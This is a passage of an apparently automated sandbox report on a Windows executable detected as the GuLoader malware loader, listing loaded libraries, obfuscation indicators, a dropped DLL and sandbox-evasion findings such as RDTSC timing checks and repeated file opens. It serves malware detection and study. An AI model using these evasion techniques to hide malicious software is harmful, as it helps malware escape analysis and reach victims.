    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: 450707124374000811.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 450707124374000811.exe, 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3251140452.000000003576A000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249022839.00000000355BF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 450707124374000811.exe, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3251140452.000000003576A000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249022839.00000000355BF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 450707124374000811.exe, 00000004.00000001.2850520898.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000000.00000002.2851812607.0000000002C18000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591135D push eax; iretd 4_2_35911369
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35911FEC push eax; iretd 4_2_35911FED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359127FA pushad ; ret 4_2_359127F9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591225F pushad ; ret 4_2_359127F9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359409AD push ecx; mov dword ptr [esp], ecx4_2_359409B6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591283D push eax; iretd 4_2_35912858
    Source: C:\Users\user\Desktop\450707124374000811.exeFile created: C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\450707124374000811.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Opens the same file many times (likely Sandbox evasion)
    Source: C:\Users\user\Desktop\450707124374000811.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Saddukisk233\centerleder.ini count: 45722Jump to behavior
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI/Special instruction interceptor: Address: 31491AD
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI/Special instruction interceptor: Address: 1D091AD
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\450707124374000811.exeRDTSC instruction interceptor: First address: 310C9BB second address: 310C9BB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FBCC93D65E8h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, dl 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\450707124374000811.exeRDTSC instruction interceptor: First address: 1CCC9BB second address: 1CCC9BB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FBCC9187548h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, dl 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A116A6 rdtsc 4_2_35A116A6
    Source: C:\Users\user\Desktop\450707124374000811.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dllJump to dropped file
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI coverage: 0.2 %
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: 450707124374000811.exe, 00000004.00000003.3249345138.0000000005702000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3584678772.0000000005702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: 450707124374000811.exe, 00000004.00000003.3249602230.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.3249383270.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.3584534506.00000000056C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI call chain: ExitProcess graph end nodegraph_0-4599
    Source: C:\Users\user\Desktop\450707124374000811.exeAPI call chain: ExitProcess graph end nodegraph_0-4603
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A116A6 rdtsc 4_2_35A116A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359835C0 NtCreateMutant,LdrInitializeThunk,4_2_359835C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB594 mov eax, dword ptr fs:[00000030h]4_2_359CB594
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB594 mov eax, dword ptr fs:[00000030h]4_2_359CB594
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A135B6 mov eax, dword ptr fs:[00000030h]4_2_35A135B6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593758F mov eax, dword ptr fs:[00000030h]4_2_3593758F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593758F mov eax, dword ptr fs:[00000030h]4_2_3593758F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593758F mov eax, dword ptr fs:[00000030h]4_2_3593758F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF5BE mov eax, dword ptr fs:[00000030h]4_2_359FF5BE
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596F5B0 mov eax, dword ptr fs:[00000030h]4_2_3596F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D35BA mov eax, dword ptr fs:[00000030h]4_2_359D35BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D35BA mov eax, dword ptr fs:[00000030h]4_2_359D35BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D35BA mov eax, dword ptr fs:[00000030h]4_2_359D35BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D35BA mov eax, dword ptr fs:[00000030h]4_2_359D35BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DD5B0 mov eax, dword ptr fs:[00000030h]4_2_359DD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DD5B0 mov eax, dword ptr fs:[00000030h]4_2_359DD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615A9 mov eax, dword ptr fs:[00000030h]4_2_359615A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615A9 mov eax, dword ptr fs:[00000030h]4_2_359615A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615A9 mov eax, dword ptr fs:[00000030h]4_2_359615A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615A9 mov eax, dword ptr fs:[00000030h]4_2_359615A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615A9 mov eax, dword ptr fs:[00000030h]4_2_359615A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD5D0 mov eax, dword ptr fs:[00000030h]4_2_359BD5D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359BD5D0 mov ecx, dword ptr fs:[00000030h]4_2_359BD5D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359695DA mov eax, dword ptr fs:[00000030h]4_2_359695DA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359755C0 mov eax, dword ptr fs:[00000030h]4_2_359755C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615F4 mov eax, dword ptr fs:[00000030h]4_2_359615F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615F4 mov eax, dword ptr fs:[00000030h]4_2_359615F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615F4 mov eax, dword ptr fs:[00000030h]4_2_359615F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615F4 mov eax, dword ptr fs:[00000030h]4_2_359615F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615F4 mov eax, dword ptr fs:[00000030h]4_2_359615F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359615F4 mov eax, dword ptr fs:[00000030h]4_2_359615F4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A155C9 mov eax, dword ptr fs:[00000030h]4_2_35A155C9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A135D7 mov eax, dword ptr fs:[00000030h]4_2_35A135D7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A135D7 mov eax, dword ptr fs:[00000030h]4_2_35A135D7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A135D7 mov eax, dword ptr fs:[00000030h]4_2_35A135D7
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35977505 mov eax, dword ptr fs:[00000030h]4_2_35977505
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35977505 mov ecx, dword ptr fs:[00000030h]4_2_35977505
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A15537 mov eax, dword ptr fs:[00000030h]4_2_35A15537
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D534 mov eax, dword ptr fs:[00000030h]4_2_3594D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D534 mov eax, dword ptr fs:[00000030h]4_2_3594D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D534 mov eax, dword ptr fs:[00000030h]4_2_3594D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D534 mov eax, dword ptr fs:[00000030h]4_2_3594D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D534 mov eax, dword ptr fs:[00000030h]4_2_3594D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D534 mov eax, dword ptr fs:[00000030h]4_2_3594D534
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597D530 mov eax, dword ptr fs:[00000030h]4_2_3597D530
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597D530 mov eax, dword ptr fs:[00000030h]4_2_3597D530
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB52F mov eax, dword ptr fs:[00000030h]4_2_359FB52F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF525 mov eax, dword ptr fs:[00000030h]4_2_359EF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF525 mov eax, dword ptr fs:[00000030h]4_2_359EF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF525 mov eax, dword ptr fs:[00000030h]4_2_359EF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF525 mov eax, dword ptr fs:[00000030h]4_2_359EF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF525 mov eax, dword ptr fs:[00000030h]4_2_359EF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF525 mov eax, dword ptr fs:[00000030h]4_2_359EF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF525 mov eax, dword ptr fs:[00000030h]4_2_359EF525
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB550 mov eax, dword ptr fs:[00000030h]4_2_359EB550
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB550 mov eax, dword ptr fs:[00000030h]4_2_359EB550
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB550 mov eax, dword ptr fs:[00000030h]4_2_359EB550
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597B570 mov eax, dword ptr fs:[00000030h]4_2_3597B570
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597B570 mov eax, dword ptr fs:[00000030h]4_2_3597B570
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B562 mov eax, dword ptr fs:[00000030h]4_2_3593B562
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35949486 mov eax, dword ptr fs:[00000030h]4_2_35949486
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35949486 mov eax, dword ptr fs:[00000030h]4_2_35949486
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B480 mov eax, dword ptr fs:[00000030h]4_2_3593B480
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359374B0 mov eax, dword ptr fs:[00000030h]4_2_359374B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359374B0 mov eax, dword ptr fs:[00000030h]4_2_359374B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359734B0 mov eax, dword ptr fs:[00000030h]4_2_359734B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E74B0 mov eax, dword ptr fs:[00000030h]4_2_359E74B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A114F6 mov eax, dword ptr fs:[00000030h]4_2_35A114F6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A114F6 mov eax, dword ptr fs:[00000030h]4_2_35A114F6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A154DB mov eax, dword ptr fs:[00000030h]4_2_35A154DB
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E94E0 mov eax, dword ptr fs:[00000030h]4_2_359E94E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C7410 mov eax, dword ptr fs:[00000030h]4_2_359C7410
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596340D mov eax, dword ptr fs:[00000030h]4_2_3596340D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF453 mov eax, dword ptr fs:[00000030h]4_2_359FF453
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB450 mov eax, dword ptr fs:[00000030h]4_2_359EB450
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB450 mov eax, dword ptr fs:[00000030h]4_2_359EB450
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB450 mov eax, dword ptr fs:[00000030h]4_2_359EB450
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EB450 mov eax, dword ptr fs:[00000030h]4_2_359EB450
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B440 mov eax, dword ptr fs:[00000030h]4_2_3594B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B440 mov eax, dword ptr fs:[00000030h]4_2_3594B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B440 mov eax, dword ptr fs:[00000030h]4_2_3594B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B440 mov eax, dword ptr fs:[00000030h]4_2_3594B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B440 mov eax, dword ptr fs:[00000030h]4_2_3594B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B440 mov eax, dword ptr fs:[00000030h]4_2_3594B440
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1547F mov eax, dword ptr fs:[00000030h]4_2_35A1547F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941460 mov eax, dword ptr fs:[00000030h]4_2_35941460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941460 mov eax, dword ptr fs:[00000030h]4_2_35941460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941460 mov eax, dword ptr fs:[00000030h]4_2_35941460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941460 mov eax, dword ptr fs:[00000030h]4_2_35941460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35941460 mov eax, dword ptr fs:[00000030h]4_2_35941460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F460 mov eax, dword ptr fs:[00000030h]4_2_3595F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F460 mov eax, dword ptr fs:[00000030h]4_2_3595F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F460 mov eax, dword ptr fs:[00000030h]4_2_3595F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F460 mov eax, dword ptr fs:[00000030h]4_2_3595F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F460 mov eax, dword ptr fs:[00000030h]4_2_3595F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595F460 mov eax, dword ptr fs:[00000030h]4_2_3595F460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF78A mov eax, dword ptr fs:[00000030h]4_2_359FF78A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A137B6 mov eax, dword ptr fs:[00000030h]4_2_35A137B6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596D7B0 mov eax, dword ptr fs:[00000030h]4_2_3596D7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593F7BA mov eax, dword ptr fs:[00000030h]4_2_3593F7BA
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FD7B0 mov eax, dword ptr fs:[00000030h]4_2_359FD7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FD7B0 mov eax, dword ptr fs:[00000030h]4_2_359FD7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF7AF mov eax, dword ptr fs:[00000030h]4_2_359CF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF7AF mov eax, dword ptr fs:[00000030h]4_2_359CF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF7AF mov eax, dword ptr fs:[00000030h]4_2_359CF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF7AF mov eax, dword ptr fs:[00000030h]4_2_359CF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CF7AF mov eax, dword ptr fs:[00000030h]4_2_359CF7AF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C97A9 mov eax, dword ptr fs:[00000030h]4_2_359C97A9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359457C0 mov eax, dword ptr fs:[00000030h]4_2_359457C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359457C0 mov eax, dword ptr fs:[00000030h]4_2_359457C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359457C0 mov eax, dword ptr fs:[00000030h]4_2_359457C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D7E0 mov ecx, dword ptr fs:[00000030h]4_2_3594D7E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597F71F mov eax, dword ptr fs:[00000030h]4_2_3597F71F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597F71F mov eax, dword ptr fs:[00000030h]4_2_3597F71F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A0972B mov eax, dword ptr fs:[00000030h]4_2_35A0972B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35945702 mov eax, dword ptr fs:[00000030h]4_2_35945702
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35945702 mov eax, dword ptr fs:[00000030h]4_2_35945702
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35947703 mov eax, dword ptr fs:[00000030h]4_2_35947703
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1B73C mov eax, dword ptr fs:[00000030h]4_2_35A1B73C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1B73C mov eax, dword ptr fs:[00000030h]4_2_35A1B73C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1B73C mov eax, dword ptr fs:[00000030h]4_2_35A1B73C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35A1B73C mov eax, dword ptr fs:[00000030h]4_2_35A1B73C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939730 mov eax, dword ptr fs:[00000030h]4_2_35939730
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35939730 mov eax, dword ptr fs:[00000030h]4_2_35939730
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35975734 mov eax, dword ptr fs:[00000030h]4_2_35975734
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594973A mov eax, dword ptr fs:[00000030h]4_2_3594973A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594973A mov eax, dword ptr fs:[00000030h]4_2_3594973A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FF72E mov eax, dword ptr fs:[00000030h]4_2_359FF72E
